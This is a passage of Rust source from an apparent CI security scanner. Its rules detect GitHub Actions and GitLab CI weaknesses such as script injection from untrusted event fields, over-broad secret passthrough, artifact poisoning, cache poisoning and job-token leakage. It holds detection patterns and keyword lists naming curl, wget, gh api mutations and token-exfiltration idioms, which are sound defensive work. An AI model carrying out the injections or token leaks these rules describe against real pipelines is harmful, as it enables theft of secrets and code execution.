/// `${{ inputs.<name> }}` or `${{ github.event.inputs.<name> }}`. The check
/// is a substring match (so it tolerates any whitespace inside the
/// `${{ … }}` expression), but the match must not be followed by a
/// name-continuation character (`[A-Za-z0-9_-]`, the characters valid in a
/// GHA input identifier). Without that boundary check, input `ref` would
/// false-positively match a body that only references `inputs.ref_name`.
fn body_references_input(body: &str, name: &str) -> bool {
    // Scan `haystack` for `needle` occurrences that end at a name boundary.
    fn contains_at_name_boundary(haystack: &str, needle: &str) -> bool {
        let mut from = 0;
        while let Some(rel) = haystack[from..].find(needle) {
            let end = from + rel + needle.len();
            let continues = haystack
                .as_bytes()
                .get(end)
                .map(|b| b.is_ascii_alphanumeric() || *b == b'_' || *b == b'-')
                .unwrap_or(false);
            if !continues {
                return true;
            }
            // Matched a longer input name sharing this prefix; keep looking.
            from = end;
        }
        false
    }
    // GHA accepts both `inputs.X` and `github.event.inputs.X` spellings.
    let direct = format!("inputs.{name}");
    let via_event = format!("github.event.inputs.{name}");
    contains_at_name_boundary(body, &direct) || contains_at_name_boundary(body, &via_event)
}
/// Rule: a `workflow_dispatch.inputs.*` value flows into a command sink
/// (`curl`, `wget`, `gh api`, `git clone`, …) or `actions/checkout`
/// `with.ref:`.
///
/// Detection:
/// 1. Read `META_DISPATCH_INPUTS` — comma-joined list of input names.
/// 2. For every Step node carrying `META_SCRIPT_BODY`, fire a finding when
///    the body references any input name AND contains a whole-word
///    occurrence of any `COMMAND_SINKS` entry.
/// 3. For every Step node carrying `META_CHECKOUT_REF`, fire a finding when
///    the ref expression references any input name (the ref is consumed by
///    `actions/checkout`, which performs `git fetch` / `git checkout`
///    against the supplied ref).
///
/// Severity: High. Dispatch is a privileged operation, but the privileged
/// surface is bounded to whoever holds `Actions: write` on the repo —
/// narrower than `pull_request_target`, broader than a maintainer-only
/// secret.
pub fn manual_dispatch_input_to_url_or_command(graph: &AuthorityGraph) -> Vec<Finding> {
    // No declared dispatch inputs → nothing attacker-controllable → no rule.
    let inputs_meta = match graph.metadata.get(META_DISPATCH_INPUTS) {
        Some(s) if !s.is_empty() => s,
        _ => return Vec::new(),
    };
    let inputs: Vec<&str> = inputs_meta
        .split(',')
        .map(str::trim)
        .filter(|s| !s.is_empty())
        .collect();
    if inputs.is_empty() {
        return Vec::new();
    }
    let mut findings = Vec::new();
    // A single step can fire BOTH findings (script-body sink and checkout
    // ref sink) — they describe different vectors.
    for step in graph.nodes_of_kind(NodeKind::Step) {
        // (a) Script body sink
        if let Some(body) = step.metadata.get(META_SCRIPT_BODY) {
            // Which declared inputs does this body actually reference?
            let referenced: Vec<&str> = inputs
                .iter()
                .copied()
                .filter(|name| body_references_input(body, name))
                .collect();
            if !referenced.is_empty() {
                // Fire only when an input reference AND a whole-word command
                // sink co-occur in the same body.
                let sinks: Vec<&str> = COMMAND_SINKS
                    .iter()
                    .copied()
                    .filter(|s| body_contains_command(body, s))
                    .collect();
                if !sinks.is_empty() {
                    findings.push(Finding {
                        severity: Severity::High,
                        category: FindingCategory::ManualDispatchInputToUrlOrCommand,
                        path: None,
                        nodes_involved: vec![step.id],
                        message: format!(
                            "Step '{}' interpolates workflow_dispatch input(s) [{}] into command sink(s) [{}] — anyone with Actions:write can pivot the run to attacker-controlled hosts/refs",
                            step.name,
                            referenced.join(", "),
                            sinks.join(", "),
                        ),
                        recommendation: Recommendation::Manual {
                            action: "Pass the input through the step's `env:` block (where the runtime quotes it) and reference `\"$INPUT_NAME\"` in the script. For URLs, validate against an allowlist before fetching. Never let a dispatch input land in a `git clone` / `actions/checkout` ref without an explicit allowlist of permitted refs.".into(),
                        },
                        source: FindingSource::BuiltIn,
                        extras: FindingExtras::default(),
                    });
                }
            }
        }
        // (b) actions/checkout ref sink
        if let Some(ref_expr) = step.metadata.get(META_CHECKOUT_REF) {
            // No command-sink requirement here: the ref expression itself is
            // the sink (checkout fetches whatever ref the dispatcher chose).
            let referenced: Vec<&str> = inputs
                .iter()
                .copied()
                .filter(|name| body_references_input(ref_expr, name))
                .collect();
            if !referenced.is_empty() {
                findings.push(Finding {
                    severity: Severity::High,
                    category: FindingCategory::ManualDispatchInputToUrlOrCommand,
                    path: None,
                    nodes_involved: vec![step.id],
                    message: format!(
                        "Step '{}' uses workflow_dispatch input(s) [{}] as the actions/checkout ref — the dispatcher chooses which commit lands on the privileged runner",
                        step.name,
                        referenced.join(", "),
                    ),
                    recommendation: Recommendation::Manual {
                        action: "Constrain the dispatch input via a `type: choice` `options:` allowlist of permitted refs/branches, or hard-code the ref and accept a different parameter (e.g. release tag) that maps onto a vetted ref.".into(),
                    },
                    source: FindingSource::BuiltIn,
                    extras: FindingExtras::default(),
                });
            }
        }
    }
    findings
}
/// Set of trigger names whose runs are influenced by parties outside the
/// repo's write-permission set — anything that can be initiated by opening a
/// PR, commenting on an issue, or reacting to another workflow's outcome.
/// Used by `secrets_inherit_overscoped_passthrough` and
/// `unsafe_pr_artifact_in_workflow_run_consumer` to gate detection.
///
/// Superset of `RISKY_TRIGGERS` above: additionally includes the plain
/// `pull_request` / `pull_request_target` triggers.
const RISKY_TRIGGER_NAMES: &[&str] = &[
    "pull_request",
    "pull_request_target",
    "pull_request_review",
    "pull_request_review_comment",
    "issue_comment",
    "workflow_run",
];
/// Returns true if any trigger name in the comma-joined `META_TRIGGERS` list
/// matches a risky trigger. Absent metadata counts as "not risky".
fn graph_has_risky_trigger(graph: &AuthorityGraph) -> bool {
    match graph.metadata.get(META_TRIGGERS) {
        Some(triggers) => triggers
            .split(',')
            .map(str::trim)
            .any(|t| RISKY_TRIGGER_NAMES.contains(&t)),
        None => false,
    }
}
/// Returns the first risky trigger name present on the graph (trimmed),
/// for use in finding messages.
fn first_risky_trigger(graph: &AuthorityGraph) -> Option<String> {
    let triggers = graph.metadata.get(META_TRIGGERS)?;
    for candidate in triggers.split(',') {
        let trimmed = candidate.trim();
        if RISKY_TRIGGER_NAMES.contains(&trimmed) {
            return Some(trimmed.to_string());
        }
    }
    None
}
/// Rule: reusable workflow call uses `secrets: inherit` under a risky trigger.
///
/// Fires once per Step node carrying `META_SECRETS_INHERIT = "true"` when the
/// graph's `META_TRIGGERS` set contains at least one attacker-influenced
/// trigger (`pull_request`, `pull_request_target`, `issue_comment`,
/// `workflow_run`, `pull_request_review`, `pull_request_review_comment`).
///
/// `secrets: inherit` forwards the entire caller secret bag to the callee
/// regardless of which secrets the callee actually consumes. Combined with a
/// trigger an external party can fire, every secret in scope is one
/// compromised callee away from exfiltration.
pub fn secrets_inherit_overscoped_passthrough(graph: &AuthorityGraph) -> Vec<Finding> {
    if !graph_has_risky_trigger(graph) {
        return Vec::new();
    }
    // Name one risky trigger for the message; "risky" is a fallback that
    // cannot occur in practice (the gate above proved one exists).
    let trigger = first_risky_trigger(graph).unwrap_or_else(|| "risky".into());
    let mut findings = Vec::new();
    for step in graph.nodes_of_kind(NodeKind::Step) {
        if !step
            .metadata
            .get(META_SECRETS_INHERIT)
            .map_or(false, |v| v == "true")
        {
            continue;
        }
        // Resolve the reusable-workflow target (first Image node reached via
        // a DelegatesTo edge) so the message can name the callee.
        let mut callee = String::from("<unknown>");
        for edge in graph.edges_from(step.id) {
            if edge.kind != EdgeKind::DelegatesTo {
                continue;
            }
            if let Some(node) = graph.node(edge.to) {
                if node.kind == NodeKind::Image {
                    callee = node.name.clone();
                    break;
                }
            }
        }
        findings.push(Finding {
            severity: Severity::High,
            category: FindingCategory::SecretsInheritOverscopedPassthrough,
            path: None,
            nodes_involved: vec![step.id],
            message: format!(
                "Job '{}' calls reusable workflow '{}' with `secrets: inherit` while the workflow is triggered by '{}' — every caller secret forwards to the callee regardless of need",
                step.name, callee, trigger
            ),
            recommendation: Recommendation::Manual {
                action: "Replace `secrets: inherit` with an explicit `secrets:` mapping listing only the secrets the callee actually consumes. For PR/comment/workflow_run-triggered callers, audit the callee for log exposure of every forwarded secret.".into(),
            },
            source: FindingSource::BuiltIn,
            extras: FindingExtras::default(),
        });
    }
    findings
}
/// Rule: `workflow_run`/`pull_request_target` consumer downloads a PR-context
/// artifact AND interprets its content into a privileged sink.
///
/// Requires:
/// 1. Graph trigger is `workflow_run` or `pull_request_target` (the producer
///    ran in PR context, so the artifact is attacker-controlled).
/// 2. At least one Step in a job carries `META_DOWNLOADS_ARTIFACT = "true"`.
/// 3. At least one Step in the *same job* carries
///    `META_INTERPRETS_ARTIFACT = "true"` (post-to-comment, write to
///    `$GITHUB_ENV`, `eval`, `unzip`, `cat`, `jq`, …).
///
/// Differs from `artifact_boundary_crossing`: that rule flags upload→download
/// trust crossings on Artifact nodes; this rule additionally requires the
/// consumer interprets the downloaded content.
pub fn unsafe_pr_artifact_in_workflow_run_consumer(graph: &AuthorityGraph) -> Vec<Finding> {
    // Gate on the trigger surface: workflow_run consumers and
    // pull_request_target both run in upstream-repo context with elevated
    // permissions while the artifact (or PR head ref) originates from PR
    // context.
    let trigger_matches = |t: &str| t == "workflow_run" || t == "pull_request_target";
    let single = graph
        .metadata
        .get(META_TRIGGER)
        .map_or(false, |s| trigger_matches(s));
    let multi = graph
        .metadata
        .get(META_TRIGGERS)
        .map_or(false, |s| s.split(',').any(|t| trigger_matches(t.trim())));
    if !(single || multi) {
        return Vec::new();
    }
    // Bucket steps by job name so a download and an interpret can be paired
    // within the same job. BTreeMap keeps the finding order deterministic.
    use std::collections::BTreeMap;
    let mut per_job: BTreeMap<String, (Vec<NodeId>, Vec<NodeId>)> = BTreeMap::new();
    for step in graph.nodes_of_kind(NodeKind::Step) {
        let flag_set = |key: &str| step.metadata.get(key).map_or(false, |v| v == "true");
        let job_key = step
            .metadata
            .get(META_JOB_NAME)
            .cloned()
            .unwrap_or_default();
        let bucket = per_job.entry(job_key).or_default();
        if flag_set(META_DOWNLOADS_ARTIFACT) {
            bucket.0.push(step.id);
        }
        if flag_set(META_INTERPRETS_ARTIFACT) {
            bucket.1.push(step.id);
        }
    }
    let mut findings = Vec::new();
    for (job, (downloaders, interpreters)) in per_job {
        // Both halves of the pattern must be present in the same job.
        if downloaders.is_empty() || interpreters.is_empty() {
            continue;
        }
        let nodes_involved: Vec<NodeId> = downloaders
            .iter()
            .chain(interpreters.iter())
            .copied()
            .collect();
        let job_label = if job.is_empty() {
            "<workflow-level>".to_string()
        } else {
            job
        };
        findings.push(Finding {
            severity: Severity::High,
            category: FindingCategory::UnsafePrArtifactInWorkflowRunConsumer,
            path: None,
            nodes_involved,
            message: format!(
                "Job '{}' downloads a PR-context artifact and interprets its content (post-to-comment, $GITHUB_ENV write, eval/unzip/cat/jq) — malicious PRs can write arbitrary content into the artifact while the consumer runs with upstream-repo authority",
                job_label
            ),
            recommendation: Recommendation::Manual {
                action: "Treat downloaded artifacts as untrusted: validate against a strict schema before parsing, never feed contents into `eval`/`$GITHUB_ENV`/`$GITHUB_OUTPUT`, and post comment bodies through a length-and-character-allowlist filter. Where possible, separate the privileged-sink step into its own job that does not download the artifact.".into(),
            },
            source: FindingSource::BuiltIn,
            extras: FindingExtras::default(),
        });
    }
    findings
}
// ── GHA security rules from corpus gap analysis ─────────────────────────
//
// Source: MEMORY/WORK/20260425-230443_taudit-gitlab-parser/corpus-results/council-gha-gaps.md
// Rules R1, R5, R9, R10. All four read META_SCRIPT_BODY (R1, R10) or
// step-level metadata stamped by the GHA parser (R5, R9). They gate on
// META_TRIGGERS where a specific trigger surface is required.
/// Checks whether the comma-separated META_TRIGGERS value (as stamped by the
/// GHA parser) contains any entry from `wanted`. Tolerant of surrounding
/// whitespace and empty segments.
fn triggers_contain_any(triggers_csv: Option<&String>, wanted: &[&str]) -> bool {
    match triggers_csv {
        None => false,
        Some(csv) => csv.split(',').any(|token| wanted.contains(&token.trim())),
    }
}
/// Locates every `${{ ... }}` expression inside `body`. Yields the trimmed
/// inner expression text together with the byte range of the whole
/// `${{ ... }}` span so callers can run surrounding-context heuristics.
/// Makes no attempt to handle nested `}}` — none of the patterns we care
/// about contain it.
fn find_template_expressions(body: &str) -> Vec<(String, std::ops::Range<usize>)> {
    let mut found = Vec::new();
    let mut scan_from = 0usize;
    loop {
        let Some(rel_open) = body[scan_from..].find("${{") else {
            break;
        };
        let open = scan_from + rel_open;
        let inner_start = open + 3;
        // An opener with no matching close terminates the scan.
        let Some(rel_close) = body[inner_start..].find("}}") else {
            break;
        };
        let close = inner_start + rel_close;
        found.push((body[inner_start..close].trim().to_owned(), open..close + 2));
        scan_from = close + 2;
    }
    found
}
/// Patterns that mark an attacker-controllable expression for R1.
/// Order matters only for documentation — detection is OR.
fn is_untrusted_context_expression(expr: &str) -> bool {
    // Examples: `github.event.issue.title`, `github.event.pull_request.body`,
    // `github.event.comment.body`, `github.event.review.body`,
    // `github.head_ref`, `inputs.target_branch`. Caller has already trimmed.
    const EVENT_PREFIXES: [&str; 7] = [
        "github.event.issue.",
        "github.event.pull_request.",
        "github.event.comment.",
        "github.event.review.",
        "github.event.discussion.",
        "github.event.workflow_run.",
        "github.event.inputs.",
    ];
    if EVENT_PREFIXES.iter().any(|p| expr.starts_with(p)) {
        return true;
    }
    // Bare `github.head_ref`, or `github.head_ref` followed by more tokens
    // (e.g. inside a composite expression).
    if expr == "github.head_ref" || expr.starts_with("github.head_ref ") {
        return true;
    }
    // `inputs.X` is attacker-influenced under workflow_dispatch / workflow_run
    // / issue_comment-driven inputs. The rule's caller gates on the trigger
    // surface, so any non-empty `inputs.*` here is suspect.
    matches!(expr.strip_prefix("inputs."), Some(rest) if !rest.is_empty())
}
/// Returns true when an expression's value lands in a script sink that
/// matters for R1 — shell text, JS source, or a write to GITHUB_ENV /
/// GITHUB_OUTPUT. Heuristic: the expression is **not** the right-hand side of
/// a YAML `env:` mapping. The parser already separates step-level `env:`
/// mappings into the secret/auth machinery, so any expression appearing inside
/// the script body itself bypasses the env-indirection mitigation by
/// definition.
fn is_script_injection_sink(_body: &str, _range: &std::ops::Range<usize>) -> bool {
    // META_SCRIPT_BODY *is* the shell/JS source, so every occurrence inside
    // it lands in executable text by construction. (Step-level `env:` values
    // are stored on the edges, not in the body.) The function exists so the
    // doc string spells out the rationale and finer future heuristics have a
    // clear hook.
    true
}
/// R1 — script injection via untrusted context.
///
/// Severity: Critical. The classic GitHub Actions remote code execution: an
/// expression an external actor controls (`github.event.issue.title`,
/// `github.head_ref`, `github.event.inputs.*` under `workflow_dispatch`)
/// is concatenated into the shell command (or the JS source for
/// `actions/github-script`) at YAML-render time, before any quoting or
/// escaping the runtime would apply to env-bound values.
pub fn script_injection_via_untrusted_context(graph: &AuthorityGraph) -> Vec<Finding> {
    let mut findings = Vec::new();
    for step in graph.nodes_of_kind(NodeKind::Step) {
        let body = match step.metadata.get(META_SCRIPT_BODY) {
            Some(b) if !b.is_empty() => b,
            _ => continue,
        };
        // Collect distinct attacker-controlled expressions, first-seen order.
        let mut hits: Vec<String> = Vec::new();
        for (expr, range) in find_template_expressions(body) {
            let dangerous = is_untrusted_context_expression(&expr)
                && is_script_injection_sink(body, &range);
            if dangerous && !hits.contains(&expr) {
                hits.push(expr);
            }
        }
        if hits.is_empty() {
            continue;
        }
        // Keep the message readable even when a step has many distinct
        // attacker-controlled interpolations: preview at most three and
        // summarise the remainder.
        let preview = hits
            .iter()
            .take(3)
            .map(|e| format!("${{{{ {e} }}}}"))
            .collect::<Vec<_>>()
            .join(", ");
        let suffix = if hits.len() > 3 {
            format!(", and {} more", hits.len() - 3)
        } else {
            String::new()
        };
        findings.push(Finding {
            severity: Severity::Critical,
            category: FindingCategory::ScriptInjectionViaUntrustedContext,
            path: None,
            nodes_involved: vec![step.id],
            message: format!(
                "Step '{}' interpolates attacker-controlled expression(s) {preview}{suffix} directly into a script body without an env: indirection — classic GitHub Actions RCE",
                step.name
            ),
            recommendation: Recommendation::Manual {
                action: "Bind the expression to a step-level `env:` variable and reference it as `\"$VAR\"` (shell) or `process.env.VAR` (JS). The runtime then quotes the value as data instead of YAML-rendering it as code.".into(),
            },
            source: FindingSource::BuiltIn,
            extras: FindingExtras::default(),
        });
    }
    findings
}
/// R5 — interactive debug action in an authority workflow.
///
/// Severity: High. A successful tmate / upterm session opens an external SSH
/// endpoint into the runner with the full job environment loaded — every
/// secret in scope, the checked-out HEAD, and write access to whatever the
/// GITHUB_TOKEN holds. Anyone who can flip `debug_enabled=true` at job start
/// (often a maintainer with `workflow_dispatch` permission) can launder the
/// job's authority off the runner.
pub fn interactive_debug_action_in_authority_workflow(graph: &AuthorityGraph) -> Vec<Finding> {
    // The workflow must hold non-default authority to qualify. Two ways:
    //  (a) any step has access to a non-GITHUB_TOKEN Secret or Identity, OR
    //  (b) any GITHUB_TOKEN identity has a non-default write permission.
    let has_extra_secrets = graph.authority_sources().any(|src| match src.kind {
        NodeKind::Secret => true,
        // GITHUB_TOKEN identities are named `GITHUB_TOKEN` or
        // `GITHUB_TOKEN (<job>)`. Anything else is extra authority
        // (cloud OIDC, ADO service connection, …).
        NodeKind::Identity => !src.name.starts_with("GITHUB_TOKEN"),
        _ => false,
    });
    let has_token_writes = graph
        .nodes_of_kind(NodeKind::Identity)
        .filter(|n| n.name.starts_with("GITHUB_TOKEN"))
        .filter_map(|n| n.metadata.get(META_PERMISSIONS))
        // `write-all` also contains the substring "write", so one check
        // covers both spellings.
        .any(|p| p.to_lowercase().contains("write"));
    if !has_extra_secrets && !has_token_writes {
        return Vec::new();
    }
    let mut findings = Vec::new();
    for step in graph.nodes_of_kind(NodeKind::Step) {
        let Some(action_ref) = step.metadata.get(META_INTERACTIVE_DEBUG) else {
            continue;
        };
        findings.push(Finding {
            severity: Severity::High,
            category: FindingCategory::InteractiveDebugActionInAuthorityWorkflow,
            path: None,
            nodes_involved: vec![step.id],
            message: format!(
                "Step '{}' uses interactive debug action '{action_ref}' inside a workflow that holds non-default secrets or write permissions — a successful debug session forwards the runner's full environment over SSH",
                step.name
            ),
            recommendation: Recommendation::Manual {
                action: "Move the debug action into a separate workflow with no secret access and `permissions: read-all`, OR gate the step on an explicit short-lived `workflow_dispatch` input that is removed after use. Never run tmate/upterm in a workflow that holds production credentials.".into(),
            },
            source: FindingSource::BuiltIn,
            extras: FindingExtras::default(),
        });
    }
    findings
}
/// R9 — PR-specific cache key in a default-branch consumer.
///
/// Severity: Medium. Speculative rule from the council gap report; the corpus
/// did not show a perfect example, so we emit Medium and document the risk.
/// A PR build that writes to a cache keyed on `github.head_ref` /
/// `github.event.pull_request.head.ref` / `github.actor` populates an entry
/// that a later default-branch run can restore — letting an attacker poison
/// the build cache from a fork PR.
pub fn pr_specific_cache_key_in_default_branch_consumer(graph: &AuthorityGraph) -> Vec<Finding> {
    // The risk needs both trigger surfaces: a push trigger so a privileged
    // default-branch run restores the cache, and a PR-context trigger so an
    // untrusted contributor can populate it in the first place.
    let triggers = graph.metadata.get(META_TRIGGERS);
    if !triggers_contain_any(triggers, &["push"])
        || !triggers_contain_any(triggers, &["pull_request", "pull_request_target"])
    {
        return Vec::new();
    }
    // PR-derived key fragments — common spelling variants.
    const PR_KEY_MARKERS: [&str; 5] = [
        "github.head_ref",
        "github.event.pull_request.head.ref",
        "github.event.pull_request.head.sha",
        "github.actor",
        "github.triggering_actor",
    ];
    let mut findings = Vec::new();
    for step in graph.nodes_of_kind(NodeKind::Step) {
        let key = match step.metadata.get(META_CACHE_KEY) {
            Some(k) if !k.is_empty() => k,
            _ => continue,
        };
        let lower = key.to_lowercase();
        if !PR_KEY_MARKERS.iter().any(|m| lower.contains(m)) {
            continue;
        }
        findings.push(Finding {
            severity: Severity::Medium,
            category: FindingCategory::PrSpecificCacheKeyInDefaultBranchConsumer,
            path: None,
            nodes_involved: vec![step.id],
            message: format!(
                "Step '{}' caches with a PR-derived key ('{key}') in a workflow that also runs on push — a fork PR can poison the cache that the default-branch build later restores",
                step.name
            ),
            recommendation: Recommendation::Manual {
                action: "Split the workflow so the `actions/cache` save side runs only on `push: branches: [main]` (or another protected ref) and PR runs use cache restore-only with `lookup-only: true`. Alternatively, key the cache on the file hashes that determine its content, not the branch or actor.".into(),
            },
            source: FindingSource::BuiltIn,
            extras: FindingExtras::default(),
        });
    }
    findings
}
/// R10 — `gh` / `gh api` runtime escalation with the default GITHUB_TOKEN.
///
/// Severity: Medium. Static permission checks see only the declared
/// `permissions:` block — they miss runtime calls that use the token to
/// perform write-class operations the workflow shouldn't be doing in a
/// PR-triggered context. Detects `gh ` invocations that mutate state
/// (`pr merge`, `release create/upload`, `api -X POST/PATCH/PUT/DELETE`)
/// in workflows triggered by `pull_request`, `issue_comment`, or
/// `workflow_run`.
pub fn gh_cli_with_default_token_escalating(graph: &AuthorityGraph) -> Vec<Finding> {
    // Trigger gate: only fire on surfaces an untrusted actor can drive.
    const RISKY_TRIGGERS: [&str; 6] = [
        "pull_request",
        "pull_request_target",
        "issue_comment",
        "workflow_run",
        "pull_request_review",
        "pull_request_review_comment",
    ];
    if !triggers_contain_any(graph.metadata.get(META_TRIGGERS), &RISKY_TRIGGERS) {
        return Vec::new();
    }
    let mut findings = Vec::new();
    for step in graph.nodes_of_kind(NodeKind::Step) {
        let body = match step.metadata.get(META_SCRIPT_BODY) {
            Some(b) if !b.is_empty() => b,
            _ => continue,
        };
        if !body_contains_gh_cli(body) {
            continue;
        }
        let Some(verb) = detect_gh_escalating_verb(body) else {
            continue;
        };
        findings.push(Finding {
            severity: Severity::Medium,
            category: FindingCategory::GhCliWithDefaultTokenEscalating,
            path: None,
            nodes_involved: vec![step.id],
            message: format!(
                "Step '{}' invokes `gh {verb}` against the default GITHUB_TOKEN inside a workflow triggered by an untrusted context — runtime privilege escalation that static permission checks miss",
                step.name
            ),
            recommendation: Recommendation::Manual {
                action: "Move write-class `gh`/`gh api` calls into a separate workflow gated on `push` (or an explicit reusable workflow with `secrets: inherit` only for the writer side). On the PR-triggered side, enforce `permissions: read-all` and verify by re-reading the GitHub Actions audit log.".into(),
            },
            source: FindingSource::BuiltIn,
            extras: FindingExtras::default(),
        });
    }
    findings
}
/// True when `body` invokes the `gh` CLI as a command (not just mentions
/// the substring `gh` inside another word). Match `gh ` at start of line, after
/// `;`, after `&&`, after `|`, or following indentation/whitespace.
fn body_contains_gh_cli(body: &str) -> bool {
    // Inline forms that follow a shell separator or substitution opener.
    const INLINE_FORMS: [&str; 6] = ["&& gh ", "|| gh ", "; gh ", "$(gh ", "`gh ", "| gh "];
    body.lines().any(|line| {
        let t = line.trim_start();
        t.starts_with("gh ")
            || t.starts_with("gh\t")
            || INLINE_FORMS.iter().any(|sep| t.contains(sep))
    })
}
/// If `body` invokes a write-class `gh` verb, return a short label for it.
/// Recognised:
///  - `gh pr merge`
///  - `gh release create` / `gh release upload` / `gh release delete`
///  - `gh api -X POST|PATCH|PUT|DELETE` (any path)
///  - `gh api ... <method>` against `/repos/.../{contents,releases,actions/secrets,environments}`
fn detect_gh_escalating_verb(body: &str) -> Option<String> {
    let lower = body.to_lowercase();
    // Direct verb forms, checked in a fixed order so the first match wins.
    const DIRECT: [(&str, &str); 5] = [
        ("gh pr merge", "pr merge"),
        ("gh release create", "release create"),
        ("gh release upload", "release upload"),
        ("gh release delete", "release delete"),
        ("gh release edit", "release edit"),
    ];
    for (needle, label) in DIRECT {
        if lower.contains(needle) {
            return Some(label.to_string());
        }
    }
    // `gh api -X <METHOD>` form. Match the method tokens directly so we don't
    // false-positive on `-X-Foo` headers etc.
    for method in ["post", "patch", "put", "delete"] {
        if lower.contains(&format!("gh api -x {method}"))
            || lower.contains(&format!("gh api --method {method}"))
        {
            return Some(format!("api -X {}", method.to_uppercase()));
        }
    }
    // Path-based heuristic: even without an explicit -X, certain endpoints are
    // mutation endpoints (`gh api repos/.../actions/secrets/FOO -F ...`).
    let mutation_paths = [
        "actions/secrets",
        "actions/variables",
        "/environments",
        "/releases",
    ];
    if lower.contains("gh api ") && mutation_paths.iter().any(|p| lower.contains(p)) {
        // Only escalate when there's also a write-flag. `-f`/`-F`/`--field`/`--input`
        // implies POST/PATCH semantics under `gh api`.
        let write_flag = [" -f ", " -f=", " -f\"", " --field", " --input"]
            .iter()
            .any(|f| lower.contains(f));
        if write_flag {
            return Some("api (mutation endpoint)".into());
        }
    }
    None
}
// ── GitLab CI rules ─────────────────────────────────────────
/// GitLab predefined variables an external contributor controls outright —
/// via the branch/tag name, the commit itself, or the MR title/description.
/// When any of these is interpolated into an unquoted shell expansion the
/// runner executes whatever the attacker put inside `` $(...) `` or backticks.
const UNTRUSTED_GITLAB_CI_VARS: &[&str] = &[
    // Ref names — controlled by whoever pushes the branch or tag.
    "CI_COMMIT_BRANCH",
    "CI_COMMIT_REF_NAME",
    "CI_COMMIT_TAG",
    // Commit metadata — controlled via the commit itself.
    "CI_COMMIT_MESSAGE",
    "CI_COMMIT_TITLE",
    "CI_COMMIT_DESCRIPTION",
    "CI_COMMIT_AUTHOR",
    // Merge-request metadata — controlled by the MR author.
    "CI_MERGE_REQUEST_TITLE",
    "CI_MERGE_REQUEST_DESCRIPTION",
    "CI_MERGE_REQUEST_SOURCE_BRANCH_NAME",
];
/// Rule: `$CI_JOB_TOKEN` (the GitLab platform-injected job token, broad scope
/// by default — registry write, package upload, project read) used as a
/// bearer credential against an external HTTP endpoint, or fed to
/// `docker login` for `registry.gitlab.com`.
///
/// Detection: read the Step's `META_SCRIPT_BODY`. Fire when the body
/// contains `$CI_JOB_TOKEN` or `${CI_JOB_TOKEN}` AND any of:
///  - a `curl` / `wget` / `http` / `https.request` invocation, OR
///  - the literal `gitlab-ci-token:` (the token-as-Basic-auth idiom), OR
///  - a `docker login` for `registry.gitlab.com`.
///
/// Severity: High. Category: Credentials.
pub fn ci_job_token_to_external_api(graph: &AuthorityGraph) -> Vec<Finding> {
    let mut findings = Vec::new();
    for step in graph.nodes_of_kind(NodeKind::Step) {
        let Some(body) = step.metadata.get(META_SCRIPT_BODY) else {
            continue;
        };
        if body.is_empty() || !body_references_ci_job_token(body) {
            continue;
        }
        // Only flag bodies where the token demonstrably reaches a sink.
        let Some(sink) = classify_ci_job_token_sink(body) else {
            continue;
        };
        findings.push(Finding {
            severity: Severity::High,
            category: FindingCategory::CiJobTokenToExternalApi,
            path: None,
            nodes_involved: vec![step.id],
            message: format!(
                "Step '{}' uses $CI_JOB_TOKEN as a bearer credential ({}) — the token's default scope (registry write, package upload, project read) means a poisoned MR job that emits it can pivot to package or registry pushes",
                step.name, sink
            ),
            recommendation: Recommendation::Manual {
                action: "Scope CI_JOB_TOKEN: in Settings → CI/CD → Job token permissions, set the inbound allowlist to the minimum projects required and disable any unused scope (package_registry, container_registry). For uploads, prefer a dedicated short-lived deploy token over CI_JOB_TOKEN. Never POST CI_JOB_TOKEN to webhooks or third-party APIs.".into(),
            },
            source: FindingSource::BuiltIn,
            extras: FindingExtras::default(),
        });
    }
    findings
}
/// True when the script body references the job token in either expansion
/// spelling (`$CI_JOB_TOKEN` or `${CI_JOB_TOKEN}`).
fn body_references_ci_job_token(body: &str) -> bool {
    ["$CI_JOB_TOKEN", "${CI_JOB_TOKEN}"]
        .iter()
        .any(|form| body.contains(form))
}
/// Classify how `$CI_JOB_TOKEN` is being used. Returns a short human-readable
/// sink description, or None when the token only appears in benign ways
/// (e.g. assignment to an env var that's never read).
fn classify_ci_job_token_sink(body: &str) -> Option<&'static str> {
    // Every classification below also requires the token to actually appear,
    // so hoist that check once up front.
    if !body_references_ci_job_token(body) {
        return None;
    }
    let lower = body.to_lowercase();
    // gitlab-ci-token:$CI_JOB_TOKEN — the canonical Basic-auth idiom.
    if lower.contains("gitlab-ci-token:") {
        return Some(
            if lower.contains("docker login") && lower.contains("registry.gitlab.com") {
                "docker login registry.gitlab.com"
            } else if lower.contains("curl") || lower.contains("wget") {
                "curl/wget Basic auth (user gitlab-ci-token)"
            } else {
                "Basic-auth credential (user gitlab-ci-token)"
            },
        );
    }
    // JOB-TOKEN: header form (curl/wget against /api/v4/...).
    if lower.contains("job-token:") {
        return Some("JOB-TOKEN header to GitLab API");
    }
    // curl --header "PRIVATE-TOKEN: $CI_JOB_TOKEN" or similar bearer use.
    let http_client = lower.contains("curl") || lower.contains("wget");
    let auth_header = lower.contains("authorization:") || lower.contains("private-token:");
    if http_client && auth_header {
        return Some("Authorization/PRIVATE-TOKEN header to HTTP endpoint");
    }
    // Generic: token appears next to a CI_API_V4_URL request — strong signal.
    if body.contains("CI_API_V4_URL") {
        return Some("HTTP request to ${CI_API_V4_URL} with token");
    }
    None
}
/// Rule: GitLab `id_tokens:` audience reused across MR-context and
/// protected-context jobs in the same file (no audience separation), or set
/// to a wildcard / multi-cloud broker URL, or shared with a `secrets:` Vault
/// path that the consuming job doesn't need.
///
/// Detection: collect every OIDC Identity node (Identity with
/// `META_OIDC == "true"`) carrying a `META_OIDC_AUDIENCE`. For each audience:
///  - Wildcard / `*` audience → fire (b).
///  - Same audience reachable from at least one Step marked `META_TRIGGER ==
///    merge_request` AND at least one Step that is NOT (i.e. protected-context
///    only) → fire (a).
///
/// Severity: High. Category: Privilege.
pub fn id_token_audience_overscoped(graph: &AuthorityGraph) -> Vec<Finding> {
    // BTreeMap, not HashMap: map iteration order drives the order findings
    // are emitted in, and HashMap iteration is nondeterministic — which made
    // finding order unstable across runs. The other rules in this file
    // already use BTreeMap for exactly this reason.
    use std::collections::BTreeMap as Map;
    let mut findings = Vec::new();
    // Collect (audience → [(identity_id, [step_ids that reach it])]).
    let mut by_aud: Map<&str, Vec<(NodeId, Vec<NodeId>)>> = Map::new();
    for ident in graph.nodes_of_kind(NodeKind::Identity) {
        let is_oidc = ident.metadata.get(META_OIDC).map(String::as_str) == Some("true");
        if !is_oidc {
            continue;
        }
        let Some(aud) = ident.metadata.get(META_OIDC_AUDIENCE) else {
            continue;
        };
